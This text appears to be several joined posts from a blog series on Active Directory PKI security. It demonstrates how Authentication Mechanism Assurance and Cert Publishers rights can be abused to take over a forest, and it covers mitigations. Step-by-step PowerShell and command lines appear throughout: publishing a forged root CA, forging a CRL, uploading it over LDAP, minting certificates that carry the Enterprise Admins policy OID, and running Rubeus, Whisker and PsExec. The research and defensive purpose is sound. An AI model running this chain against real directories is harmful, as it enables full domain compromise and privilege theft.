certutil -dspublish -f .\FakeCA.cer rootca


Opps – that worked – so what happened? Basically as certutil was running as SYSTEM on ‘Issuing CA 2’ being member of ‘Cert Publishers’ it had the ability to write the certificate of our ‘Fake CA’ into the existing object of ‘
CN=Chrisse Root CA,CN=Certificate Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com’s ‘cACertificate’ attribute becuse the subject matched ‘CN=Chrisse Root CA,DC=chrisse,DC=com’
Our ‘Fake CA’ certificate is now the 2:nd value added to the ‘cACertificate’ attribute

Now the interesting part – will all domain joined clients within this forest now trust our ‘Fake CA’?

Ops again, yep even on Domain Controllers (DCs) / Key Distribution Centers (KDCs). So what can we do now, the lead certificate we issued above with the AMA Issuance Policy OID can we use it to perform PKINIT and take over the forest?

Nope – not possible (at least not yet 🙂 ) – even that the certificate don’t have a CDP extension at all, the KDC demands that all certificates used by PKINIT needs to have a valid CDP or OCSP. What if we fix that as well?

Create and Sign CRL with Fake CA
Import-Module -Name CertRequestTools
$Crl = [CERTENROLLlib.CX509CertificateRevocationListClass]::new()
$Crl.Initialize()
$dn = [CERTENROLLlib.CX500DistinguishedNameClass]::new()
$dn.Encode("CN=Chrisse Root CA,DC=chrisse,DC=com", [CERTENROLLlib.x500NameFlags]::XCN_CERT_X500_NAME_STR)
$Crl.Issuer = $dn
$Crl.CRLNumber([CERTENROLLlib.EncodingType]::XCN_CRYPT_STRING_HEX) = "0001"
$signer = [CERTENROLLlib.CSignerCertificateClass]::new()
# Note the thumbprint below is the 'Fake CA' certificate with the private key available 
$signer.Initialize($false,[CERTENROLLlib.X509PrivateKeyVerify]::VerifyNone, [CERTENROLLlib.EncodingType]::XCN_CRYPT_STRING_HEXRAW, "D948F2E5585FD3C7802263DAED9722E67315FA02")
$Crl.SignerCertificate = $signer
$Crl.Encode()

[System.IO.File]::WriteAllBytes("fakeca.crl", [System.Convert]::FromBase64String($Crl.RawData()))

So the next step would be to publish the signed CRL for our fake CA somewhere – we could just host a webserver somewhere and include the URL in a newly issued leaf certificate – It would look something like this:

Issue certificate with AMA extension and HTTP CDP
$AmaExtension = New-CertificatePoliciesExtension -Oid "1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402"

$CRLDistInfo = [CERTENClib.CCertEncodeCRLDistInfoClass]::new()
$CRLDistInfo.Reset(1)
$CRLDistInfo.SetNameCount(0, 1)
$CRLDistInfo.SetNameEntry(0, 0, 7, "http://192.168.1.1/cdp/fakeca.crl")
$CRLDistInfoB64 = $CRLDistInfo.EncodeBlob([CERTENClib.EncodingType]::XCN_CRYPT_STRING_BASE64)
$CRLDistInfoExtManaged = [System.Security.Cryptography.X509Certificates.X509Extension]::new("2.5.29.31", [Convert]::FromBase64String($CRLDistInfoB64), $false)

 $params = @{
    Type = 'Custom'
    Subject = 'CN=DEMO5 - fakecaso2'
    #KeySpec = 'Signature'
    KeyExportPolicy = 'Exportable'
    KeyLength = 2048
    HashAlgorithm = 'sha256'
    NotAfter = (Get-Date).AddMonths(10)
    CertStoreLocation = 'Cert:\CurrentUser\My'
    Signer = $signer
    TextExtension = @(
     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',
     '2.5.29.17={text}upn=caso@nttest.chrisse.com')
    Extension =  $CRLDistInfoExtManaged, $AmaExtension
}
New-SelfSignedCertificate @params

Find any user within the forest where you can write to the ‘altSecurityIdentities’ attribute

Set-AltSecurityIdentities
$cert  = ls Cert:\CurrentUser\my | where { $_.subject -eq "CN=DEMO5 - fakecaso2" }
.\Set-AltSecurityIdentities.ps1 -Identity CASO -MappingType IssuerSerialNumber -Certificate $cert

But what if the Domain Controllers (DCs) / Key Distribution Centers (KDCs) would block outgoing HTTP traffic to random destination(s) – well they should.

But what they can’t block is LDAP access to themselves right? 🙂 So let’s go for an LDAP CDP instead – hm but wait we only have the power of being ‘Cert Publishers’ through the SYSTEM context of ‘Issuing CA 2’ – turns out that might be a probelm.

It turn’s out that ‘Cert Publishers’ have Full Control on any sub-container created as part of every Enterprise CA installation, let’s use that 🙂

Upload CRL signed by FakeCA to AD
using namespace System.DirectoryServices.Protocols

$Assembly = "System.DirectoryServices.Protocols"
Try
{
Add-Type -AssemblyName $Assembly -ErrorAction Stop
}
Catch
{

throw
}
# Connect to $ForestDomainName
$Identifier = [LdapDirectoryIdentifier]::new($ForestDomainName, 389, $false, $false)
$Ldap = [LdapConnection]::new($Identifier, $null, [AuthType]::Kerberos)
$Ldap.AutoBind = $false
$Ldap.ClientCertificates.Clear()
$SessionOptions = $Ldap.SessionOptions
$SessionOptions.LocatorFlag = [LocatorFlags]::WriteableRequired -bor [LocatorFlags]::DirectoryServicesRequired -bor [LocatorFlags]::ForceRediscovery
$SessionOptions.Signing = $true
$SessionOptions.Sealing = $true
$SessionOptions.ProtocolVersion = 3
$SessionOptions.ReferralChasing = [ReferralChasingOptions]::None

Try
{
$Ldap.Bind()
}
Catch
{

throw
}

# Get configurationNamingContext
$ConfigNamingContext = "configurationNamingContext"

$RootDseSearchRequest = [SearchRequest]::new([String]::Empty, "(&(objectClass=*))", [SearchScope]::Base, $ConfigNamingContext)
Try
{
$RootDseSearchResponse = [SearchResponse]$Ldap.SendRequest($RootDseSearchRequest)
}
Catch
{

throw
}
If ($RootDseSearchResponse.Entries.Count -eq 0)
{

throw
}
$RootDse = $RootDseSearchResponse.Entries[0]

If (!$RootDse.Attributes.Contains($ConfigNamingContext))
{

throw
}
$CDPLocation = ""
$CASubject = "CN=Chrisse Root CA"
$Configuration = $RootDse.Attributes[$ConfigNamingContext][0]

$searchRequest = [SearchRequest]::new([String]::Format("CN=CDP,CN=Public Key Services,CN=Services,{0}", $Configuration), "(objectClass=cRLDistributionPoint)", [SearchScope]::Subtree, "objectClass")

$searchResponse = $ldap.SendRequest($searchRequest);

if ($searchResponse.Entries.Count -eq 0)
{
throw
}
foreach($entry in $searchResponse.Entries)
{
if($entry.DistinguishedName.StartsWith($CASubject, [System.StringComparison]::CurrentCultureIgnoreCase))
{
$CDPContainer = $entry.DistinguishedName.IndexOf(',') +1
$CDPLocation = $entry.DistinguishedName.Substring($CDPContainer)
}
}

if ($CDPLocation -eq "")
{
$CDPContainer = $searchResponse.Entries[0].DistinguishedName.IndexOf(',') +1
$CDPLocation = $searchResponse.Entries[0].DistinguishedName.Substring($CDPContainer)
}

#Load the CRL created and signed earlier from file
$CrlBytes = [System.IO.File]::ReadAllBytes("fakeca.crl")

$addRequest = [AddRequest]::new([String]::Format("$CASubject,{0}", $CDPLocation),

[DirectoryAttribute]::new("objectClass", "cRLDistributionPoint"),
[DirectoryAttribute]::new("certificateRevocationList",$CrlBytes)

)
$addResponse = $ldap.SendRequest($addRequest)

So now let’s issue a new certificate from our ‘FakeCA’ that includes both the AMA Issuance Policy OID and the CDP extension pointing to an LDAP URI instead of HTTP.

Issue certificate with AMA extension and LDAP CDP
Import-Module -Name CertRequestTools
$AmaExtension = New-CertificatePoliciesExtension -Oid "1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402"
$CRLDistInfo = [CERTENClib.CCertEncodeCRLDistInfoClass]::new()
$CRLDistInfo.Reset(1)
$CRLDistInfo.SetNameCount(0, 1)
$CRLDistInfo.SetNameEntry(0, 0, 7, "ldap:///CN=Chrisse Root CA,CN=NTTEST-CA-01,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com?certificateRevocationList?base?objectClass=cRLDistributionPoint")
$CRLDistInfoB64 = $CRLDistInfo.EncodeBlob([CERTENClib.EncodingType]::XCN_CRYPT_STRING_BASE64)
$CRLDistInfoExtManaged = [System.Security.Cryptography.X509Certificates.X509Extension]::new("2.5.29.31", [Convert]::FromBase64String($CRLDistInfoB64), $false)

 $params = @{
    Type = 'Custom'
    Subject = 'CN=DEMO5 - fakecaso3'
    #KeySpec = 'Signature'
    KeyExportPolicy = 'Exportable'
    KeyLength = 2048
    HashAlgorithm = 'sha256'
    NotAfter = (Get-Date).AddMonths(10)
    CertStoreLocation = 'Cert:\CurrentUser\My'
    # $signer is the 'Fake CA' certificate with private key
    Signer = $signer
    TextExtension = @(
     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',
     '2.5.29.17={text}upn=caso@nttest.chrisse.com')
    Extension =  $CRLDistInfoExtManaged, $AmaExtension
}
New-SelfSignedCertificate @params

Find any user within the forest where you can write to the ‘altSecurityIdentities’ attribute

Set-AltSecurityIdentities
$cert  = ls Cert:\CurrentUser\my | where { $_.subject -eq "CN=DEMO5 - fakecaso3" }
.\Set-AltSecurityIdentities.ps1 -Identity CASO -MappingType IssuerSerialNumber -Certificate $cert

Now perform PKINIT using the certificate with AMA Issuance OID and LDAP CDP from/signed ny our ‘Fake CA’ – nothing can stop us now.

Use Rubeus to preform the PKIINIT and thanks to having the AMA Issuance OID we should be ‘Enterprise Admins’ within the forest.

cmd
rubeus asktgt /user:CASO /certificate:<HASH> /enctype:aes256 /createnetonly:C:\Windows\System32\cmd.exe /show

All it required was altSecurityIdentities + AMA + Cert Publishers – a T1 admin that had access to a Enterprise CA in T1 and the ability to write to ‘altSecurityIdentities’ to at least one user within the entire forest, and of course that AMA are being used to safeguard Enterprise Admins.

So to summaries this: All Enterprise CAs within an Active Directory forest _must_ be managed from T0, otherwise escalation paths like the one just described can be accomplished – and just think about what we have done here – even if you’re not using AMA, there is still a Certificate Authority that is trusted on/by all domain joined devices within the forest, you can create web-server certificates, code signing certs etc.

Note all my demos uses ‘CertRequestTools‘ from Carl Sörqvist and in this case also Rubeus from Will Schroeder.

Credits to “Decoder’s” blog that bought this topic to the light, I have just proven it can be combined with AMA abuse to gain full control of the forest as well writing some sample code how to create a ‘Fake CA’ in PowerShell.

When your Enterprise PKI becomes one of your enemies (Part 5)

Mitigate Authentication Mechanism Assurance (AMA) abuse
In the last blog post series – When your Enterprise PKI becomes one of your enemies (Part 4) we vent trough how Authentication Mechanism Assurance (AMA) works and how it can be abused together with Public Key Infrastructure (PKI) to compromise an Active Directory forest if it’s not designed the right way.

One of the core issues here is that has been demonstrated in the previous blog article(s) is that AMA abuse can be performed by obtaining a certificate from a certificate authority that is trusted by the KDC (but not necessarily being trusted in NTAuth) – to summary the requirements again.

  1. Obtain a certificate from a certificate authority (CA) that is trusted on the KDC and being able to supply the AMA Issuance Policy OID – this can be archived by:
    • Certificate Template configured for ‘Supply in the request’ – SITR
    • Being able to write to at least one user account’s altSecId (altSecurityIdentities) attribute.
  2. Using key-trust and obtain a certificate from a certificate authority (CA) that is trusted in NTAuth and being able to supply the AMA Issuance Policy OID – this can be archived by:
    • Certificate Template configured for ‘Supply in the request’ – SITR
    • Being local administrator or being able to become SYSTEM on any domain member within the forest e.g. a regular client is enough.

Note the privilege escalation using AMA abuse depends on the privilege that is linked to the ‘AMA Issuance Policy OID’

So how can we mitigate those?

Mitigation 1: Un-trust ”Issuing CA 2″ on all Domain Controllers / Key Distribution Centers
Let’s think a bit about the first scenario, (1.) – here it’s not even required that the certificate authority is trusted within NTAuth, it’s only enough that the CA is trusted on the KDCs. So even with our two Enterprise CA design where on of them (CA2 is NOT trusted in NTAuth) – where not going to be protected as ‘Issuing CA 2’ is still an Enterprise CA and is going to be be rolled out to all domain members to the ‘intermediate certificate authorities’ store including on domain controllers / kdc’s.

One way to block this could be to to specifically “Un-trust” the certificate authority (CA) on the domain controllers / kdc’s. This can be accomplished by adding the ‘Issuing CA 2’ CA certificate to the “Untrusted Certificates” store on all domain controllers / kdc’s.

Note: This can be done using a Group Policy of course but it needs to be updated every time the CA certificate on ‘Issuing CA 2’ is renewed.

The real downside with this is the manual maintenance of blocking ‘Issuing CA2’ as new certificates will be issued over time.

Let’s try another approach

Mitigation 2 – Require an Issuance Policy

One way to mitigate the AMA abuse would be to ensure that no one can supply an issuance policy at all in certificates issued by ‘Issuing CA2’ or any other certificate authority within the forest that is being trusted on domain controllers / kdc’s – that might be certificate authorities that host supply in the request (SITR) templates but is not limited to, It can also be standalone or 3rd party CAs.

By including your own Issuance Policy OID (Let’s call it ‘Low TLS Low Assurance Policy’) into ‘Issuing CA 2’s CA certificate and omitting the “2.5.29.32.0” – All Issuance Policy, It becomes an enforcement that all leaf certificates issued by the CA also needs to include your own Issuance Policy. Since all leaf certificate needs to contain your own Issuance Policy OID it would by design be impossible to include the policy OID used by AMA, hence blocking any AMA abuse.

So how is this implemented in the reality, well it depends on the type of certificate auhtority but for Active Directory Certificate Services (AD CS) – this would go into your capolicy.inf.

CAPolicy.inf with Chrisse TLS Low Assurance Policy
[Version]
Signature= "$Windows NT$"

[BasicConstraintsExtension]
Pathlength = 0
Critical = true

[PolicyStatementExtension]
Policies = EnterpriseCA02Oid,LowIssuancePolicy
Critical = 0

[EnterpriseCA02Oid]
Notice = "Chrisse Issuing CA 2"
OID = 1.3.6.1.4.1.51467.2.1.2.1.3

[LowIssuancePolicy]
Notice = "Chrisse TLS Low Assurance Policy"
OID = 1.3.6.1.4.1.51467.2.1.2.3.1

[Certsrv_Server]
RenewalKeyLength = 4096
RenewalValidityPeriodUnits = 6
RenewalValidityPeriod = years
CRLPeriod = days
CRLPeriodUnits = 3
CRLDeltaPeriod = days
CRLDeltaPeriodUnits = 0
ClockSkewMinutes = 20 
LoadDefaultTemplates = 0
AlternateSignatureAlgorithm = 0

Now to the downside of this mitigation approach – how do you ensure that the ‘TLS Low Assurance Policy’ is included in every leaf certificate, because if you don’t the issuance will fail. If you have an Active Directory Certificate Service (AD CS) – Enterprise CA as in this case ‘Issuing CA 2’ is, it’s just not member of NTAuth, you can simply include this certificate policy in all templates that is being published on the ‘Issuing CA 2’, this also safeguards from someone mistakenly publishing a certificate template that do not belong their because if that template is missing the ‘TLS Low Assurance Policy’ it would again fail enrollment of any certificate using that template.

But what about 3rd party CAs or Active Directory Certificate Services (AD CS) installed as a standalone certificate authority, well then it must be included in the request (CSR).
This can be done fairly simple with openssl:

cmd
openssl req -new -subj "/CN=RHEL9" -addext "subjectAltName = DNS:RHEL9, DNS:RHEL9.eur.corp.chrisse.com" -addext "certificatePolicies = 1.3.6.1.4.1.51467.2.1.2.3.1" -newkey rsa:2048 -keyout key.pem -out req.pem -nodes

It’s a bit more complicated using native PowerShell, but relatively easy using Carl Sörqvist’s module.

PowerShell
Import-Module -Name CertRequestTools
$CA2 = "nttest-ca-02.nttest.chrisse.com\Chrisse Issuing CA 2"  
$IssuancePolicyExtension = New-CertificatePoliciesExtension -Oid "1.3.6.1.4.1.51467.2.1.2.3.1"
 
New-PrivateKey -RsaKeySize 2048 -KeyName ([Guid]::NewGuid()) `
| New-CertificateRequest `
    -Subject "CN=DEMO3" `
    -UserPrincipalName "caso@nttest.chrisse.com" `
    -OtherExtension $IssuancePolicyExtension `
| Submit-CertificateRequest `
    -ConfigString $CA2 `
| Install-Certificate -Name My -Location CurrentUser

So an Enterprise CA can never be managed outside of T0
Why? Let’s have a look at this scenario – assume that ‘Issuing CA 2’ would not be managed from Tier 0 for a while:

In that scenario a Tier 1 administrator could logon to ‘Issuing CA 2’ become SYSTEM and acting as the machines security context, Enterprise CAs are automatically added to the ‘Cert Publishers’ Group and that group is always given ‘Full Control’ to a Enterprise CAs ‘certificationAuthority’ object within ‘CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com’

This is unfortunately hardcoded into the installation of an Enterprise CA – But now to the interesting part what can you do if you’re member of ‘Cert Publishers’? Stay tuned for the next part in this blog series “When your Enterprise PKI becomes one of your enemies (Part 6)”

When your Enterprise PKI becomes one of your enemies (Part 4)

In the last blog post series – When your Enterprise PKI becomes one of your enemies (Part 3) we vent trough how Authentication Mechanism Assurance (AMA) works and how it can be abused together with Public Key Infrastructure (PKI) to compromise an Active Directory forest if it’s not designed the right way.

To summaries the abuse demonstrated in the post – here are the requirements (Note that the CA don’t have to be trusted in NTAuth)

  1. Obtain a certificate from a certificate authority (CA) that is trusted on the KDC and being able to supply the AMA Issuance Policy OID – this can be archived by:
    • Certificate Template configured for ‘Supply in the request’ – SITR
    • Being delegated Certificate Manager on the certificate authority for one or more templates
  2. The KDC must have a valid certificate
  3. Being able to write to at least one user account’s altSecId (altSecurityIdentities) attribute.

Authentication Mechanism Assurance (AMA) abuse using Key Trust and KCL

Let’s demonstrate another way to abuse Authentication Mechanism Assurance (AMA) and change the requirements a bit – this is only possible against Windows Server 2016 KDCs and later.

Windows Server 2016 introduced Key Trust model to the KDC where PKINIT can be performed using a explicit key trust instead of certificate trust. They key trust model works by mapping the public key of a private/public key pair into the ‘msDS-KeyCredentialLink’ attribute of a security principal deriverad from the user or computer class, authentication can then be performed by providing the public key. This functionality was mainly added to support Windows Hello for Business (WHFB) to allow other authentication methods to be used on top of PKINIT, it’s also utilized with Entra ID – Kerberos Cloud Trust.

For more information see – 3.1.5.2.1.4 Key Trust

So what does the Key Trust model have to do with Authentication Mechanism Assurance (AMA)?

We can think of the ‘msDS-KeyCredentialLink’ as the ‘altSecurityIdentities’ attribute in the previous abuse scenario – But there is one major difference a computer account can by default write to it’s own ‘msDS-KeyCredentialLink’ attribute granted to the SELF security principal on every computer accounts default ACL – as long as the ‘msDS-KeyCredentialLink’ is empty –

This is interesting as it means there is no need to have any special access in the directory to upload the public key of our private/public key pair as long as we can become / operate in the security context of just one domain joined computer account within the entire forest – doing so would require being local administrator at one of those boxes utilizing PsExec to become SYSTEM.

Note all my demos uses ‘CertRequestTools‘ from Carl Sörqvist and in this case also Rubeus from Will Schroeder and Whisker from Elad Shamir

But first we need to obtain a certificate with the AMA Issuance Policy OID in order to abuse it – and enroll it to the machine, replace <Template> with a template in your environment configured for – Supply in the request (SITR) :

AMA-KCL.ps1
Import-Module -Name CertRequestTools
# Chrisse Issuing CA1 is trusted in NTAUTH
$CA1 = "nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1"  
# A0 AMA Policy OID (linked to Enterprise Admins)
$AmaExtension = New-CertificatePoliciesExtension -Oid "1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402"
 
New-PrivateKey -RsaKeySize 2048 -KeyName ([Guid]::NewGuid()) `
| New-CertificateRequest `
    -Subject "CN=DEMO4" `
    -UserPrincipalName "NTTEST-CL-01.nttest.chrisse.com" `
    -OtherExtension $AmaExtension `
| Submit-CertificateRequest `
    -ConfigString $CA1 `
    -Template <Template> `
| Install-Certificate -Name My -Location LocalMachine

Now it’s time to become the machine it self and act as SYSTEM on ”NTTEST-CL-01.nttest.chrisse.com”

cmd
Psexec.exe -i -s C:\WINDOWS\system32\cmd.exe

Now we’re going to add the public key of our certificate to the ‘msDS-KeyCredentialLink’ attribute – to do this we use a tool named Whisker.

Replace <Hash> with the hash of the certificate issued previously and lunch it in the cmd instance created by Psexec.

cmd
whisker add /target:NTTEST-CL-01$ /path:<HASH>

Note that I’ve modified whisker slightly to look for a certificate by hash in the computer personal store also known as LocalMachine\MY.

Now the path is very similar to the previous abuse scenario demonstrated – we will use rubeus to perform a PKINIT with our certificate’s public key, it’s going to be matched with the key we just stored in ‘msDS-KeyCredentialLink’ of the computer account “NTTEST-CL-01.nttest.chrisse.com”

Note that I’ve modified rubeus slightly to also look for certificates by hash in the computer personal store also known as LocalMachine\MY.

cmd
rubeus asktgt /user:NTTEST-CL-01$ /certificate:<HASH> /enctype:aes256 /createnetonly:C:\Windows\System32\cmd.exe /show

We should now be authenticated as the computer account “NTTEST-CL-01.nttest.chrisse.com” and having the extra two security groups – ‘Enterprise Admins (AMA)’ and ‘Enterprise Admins’ (RID 519) as part our token thanks to the AMA Issuance Policy being present in the certificate we authenticated with.


You should now see something similar to the screen below, the cmd launched by rubeus should now have ‘Enterprise Admin’ privileges and you should be able to add a user to ‘Domain Admins’ as stated in the example.


Summary

The main difference using this path to abuse Authentication Mechanism Assurance (AMA) compared to the example demonstrated in the previous blog post is mainly two things.

  1. The ability to become local administrator at any computer within the Active Directory forest instead of having write access in Active Directory to a users ‘altSecurityIdentities’ attribute.
  2. For this to work the certificate authority that the certificate is issued from must be from a certificate authority that is trusted in NTAuth.

The requirement of being able to supply the AMA Issuance OID into the certificate still remains and can be achieved the same way.

  • Templates published on the Certificate Authority that are configured for Supply in the request – SITR.
  • Being Certificate Manager on the CA over one or more templates

One side effect of dealing with a key trust here instead of a certificate trust is that the KDC will ignore any validation errors such as CRL – that means if a certificate get issued for AMA abuse and stored in any computer accounts ‘altSecurityIdentities’ in the forest – it would NOT help if you would revoke that certificate. Pretty bad isn’t it? In order to scan your forest you must obtain the public key for any certificate issued with the AMA Issuance Policy OID from all your Certificate Authorities and start scanning every single object with contents in ‘msDS-KeyCredentialLink’ and it’s a linked multi-valued attribute.


Authentication Mechanism Assurance (AMA) is a good feature if being deployed correctly for the reasons mentioned in the beginning of this post, binding strong privileges to certificate based authentication and just in time is a good thing for sure – the question remains what can we do to prevent the abuse of Authentication Mechanism Assurance (AMA) as described and demonstrated in this blog post? It’s possible if you design your Public Key Infrastructure the right way and how it integrated with Active Directory and we’re going to cover some alternatives on how this can be mitigated in coming blog posts.